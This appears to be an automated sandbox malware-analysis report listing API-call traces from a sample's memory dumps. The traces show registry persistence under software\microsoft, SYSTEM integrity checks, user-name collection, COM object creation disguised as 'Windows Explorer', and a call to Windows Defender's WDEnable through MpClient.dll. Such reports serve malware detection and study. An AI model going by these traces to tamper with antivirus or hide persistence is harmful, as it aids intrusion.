                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            • Opcode ID: 39a02fd67461b59944fc2777e90484ca92c6c71321e5749596828a8c1181faa0
                                                                                                                                                                                                            • Instruction ID: f3bfd1e9bc7a1451e5ffc3dee36508268ad7b8ab5e19761d113258a3d9e04498
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39a02fd67461b59944fc2777e90484ca92c6c71321e5749596828a8c1181faa0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21AB36941114ABD7709BA8AC48FDE77BCEB45364F9402D5EA05D3180FB30DE5587A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 698896B4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 217510255-2086362228
                                                                                                                                                                                                            • Opcode ID: 9b44c21adba570f0f78005d9a91c3b28b9bb01c324cf47cc8e37b16869673f8d
                                                                                                                                                                                                            • Instruction ID: 3c7f919c13970d223deefaf38efdb687625a569ec523427cd7b716c3292c661e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b44c21adba570f0f78005d9a91c3b28b9bb01c324cf47cc8e37b16869673f8d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A319671E412286AEB26DB659C49BEE7B7CEF04704F4005D9EA49E7140D7F05E848BE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6B41
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6B5F
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02BB6B7A
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000001,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6BA1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 698896B4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 217510255-2086362228
                                                                                                                                                                                                            • Opcode ID: 13b713a950e6957190f99bcf5d654bc9325bf44c57b760965c84fee10d47e055
                                                                                                                                                                                                            • Instruction ID: 1901724a7288bbe702ed13dbb7a547ebc370532850a48d1f11987cf042e34688
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13b713a950e6957190f99bcf5d654bc9325bf44c57b760965c84fee10d47e055
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31C671D412586AEB25DB64CC4ABEF7B7CEF04705F4045D8E749E7180E7F09A888BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4908
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
                                                                                                                                                                                                            • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                            • API String ID: 4044281766-3691563785
                                                                                                                                                                                                            • Opcode ID: 070f051068cf108f6ac8d6db46d2bdafb25315ddf0566f03980b57bdce55c427
                                                                                                                                                                                                            • Instruction ID: d8b115841d5c091acce9d9a813f0d02a609d9044164bb3ea084c23ad5a695ec5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 070f051068cf108f6ac8d6db46d2bdafb25315ddf0566f03980b57bdce55c427
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC31C471D40209AFEB20CBA5C888FEE7BB8FB44355F8884D8EB4567081E7789508CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                            • API String ID: 1010965793-1794910726
                                                                                                                                                                                                            • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5023
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5032
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02BD5039
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5051
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD5068
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD506E
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD508F
                                                                                                                                                                                                            • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50B6
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50CA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02BD5000
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                            • API String ID: 2345603349-374730529
                                                                                                                                                                                                            • Opcode ID: 5fcaa63946aeaee850b0f6c11a0cb1f84f6fcbdf227c041d8ac49a7148819d89
                                                                                                                                                                                                            • Instruction ID: 6789d0d17bad7a8ea0044429a384249f0915499dff3024955db65e8e319df726
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fcaa63946aeaee850b0f6c11a0cb1f84f6fcbdf227c041d8ac49a7148819d89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C82136B2D00209ABDB3196648C44BFFBBBDEF84741FA40599F645E7140FB70AA448BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC2587
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,76F8F550,00000000), ref: 02BC259E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,76F8F550,00000000), ref: 02BC25AB
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?,?,76F8F550,00000000), ref: 02BC25E7
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02C09F08,00000000,00000104,00000000,00000001,?,76F8F550,00000000), ref: 02BC2611
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02BC2620
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,76F8F550,00000000), ref: 02BC2623
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02BC2630
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,76F8F550,00000000), ref: 02BC2633
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 698893a4a
                                                                                                                                                                                                            • API String ID: 780088666-3558868419
                                                                                                                                                                                                            • Opcode ID: 9dbb76e8f308827b1752c4d35afe026d6fb98b8024b167208e19abd5d2b7768f
                                                                                                                                                                                                            • Instruction ID: ba57be0b6a028b7d7e3e7fe08f20b1a04dcb2f4b129eb11f6b97c965d30d6848
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dbb76e8f308827b1752c4d35afe026d6fb98b8024b167208e19abd5d2b7768f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26110671A8031467D770A6385C19FDB7B6CDB90B41F504594FA86AB1C0DFF19880CBE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02BC4EFF
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F02
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F0F
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4F12
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F2A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F2D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F3A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4F3D
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02BC4F53
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02BC4F5D
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02BC4F67
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 278890334-0
                                                                                                                                                                                                            • Opcode ID: 2c686425698de2403f40b16b554f99eea468f0dd0307e8937ec7fcd08a892860
                                                                                                                                                                                                            • Instruction ID: cf9245de8cd8d9da76434fd6610c96fdf8c3b640081f8a1eccf4fd1b808d090e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c686425698de2403f40b16b554f99eea468f0dd0307e8937ec7fcd08a892860
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21F031A052146BDB209BB5AC58FEF7BBCEF48315F210899E649E3140DA70CA10CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC478A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC47C0
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02BC47E7
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02BC480A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02BC487D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4884
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4894
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02BC48C2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 1484339481-3673152959
                                                                                                                                                                                                            • Opcode ID: b71f6749c1284ee3d857510fc7bfbc60269354f3ca321a5477df5c303356efab
                                                                                                                                                                                                            • Instruction ID: c58da3e582630a2366f7ff15a14559b0d2f461616fd3c9762a6a8c5fe225898c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b71f6749c1284ee3d857510fc7bfbc60269354f3ca321a5477df5c303356efab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C411C329041D99BDB25CF659D28FDBBBB8EF81B44F1441D8EE44A7140D770A709CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCA068
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BCA227), ref: 02BCA09F
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(02BCA227,698892b0a,00000000,?,00000000,?), ref: 02BCA0BC
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(02BCA227), ref: 02BCA0C6
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BCA0F9
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,698892b0a,00000000,?,00000000,?), ref: 02BCA116
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BCA120
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 698892b0a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-3865144223
                                                                                                                                                                                                            • Opcode ID: 6f277beb46afed9ec01ca3a0d5c67a64547452e1b1453597688b58647e86cc22
                                                                                                                                                                                                            • Instruction ID: b36c2fa7cfca52b4eddb3fd9db32cd47d687dc15ef5b7814e57e07409f279eeb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f277beb46afed9ec01ca3a0d5c67a64547452e1b1453597688b58647e86cc22
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD212C75E40209FBEB10DFA4CC95FEEBBB8EB48744F504599EA01E7180E7B4A6148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC36B8
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02BC36EF
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,698892F8a,00000000,?,00000000,?), ref: 02BC370C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BC3716
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BC3749
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,698892F8a,00000000,?,00000000,?), ref: 02BC3766
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BC3770
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 698892F8a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-397239082
                                                                                                                                                                                                            • Opcode ID: f765742468255dee4e07ef6b74f033bde6cff856ab9b8af0897135fae83e7bdf
                                                                                                                                                                                                            • Instruction ID: 98ae6b11a15e2920a8d307366be80f179d44f40412deb0ba75f8291c18946f74
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f765742468255dee4e07ef6b74f033bde6cff856ab9b8af0897135fae83e7bdf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34212F75E50209FBEB10DFA4CC85FEEBBB8EB44744F90459AE601E7180E7B4A6148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4664
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02BC4687
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 02BC46AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 02BC471D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BC4724
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4734
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02BC4762
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4043890984-3673152959
                                                                                                                                                                                                            • Opcode ID: 845834a5690346626940000325082f9039b97e9904ce517a21d506ada99f682f
                                                                                                                                                                                                            • Instruction ID: 65aba80652946656d5089a921dc38f20a7ee95edbd385ce473e2f8a34ea12d45
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845834a5690346626940000325082f9039b97e9904ce517a21d506ada99f682f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB311C32D00259ABDB32CB648C18FDB7BB8EF86744F1542E9EE5497100D7709B49CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCA147
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BCA159
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,02BCA33F,?,02BCA33F), ref: 02BCA173
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(02BCA33F,698892b0a,00000000,00000004,00000004,00000004,02BCA33F), ref: 02BCA190
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BCA19A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BCA1A4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
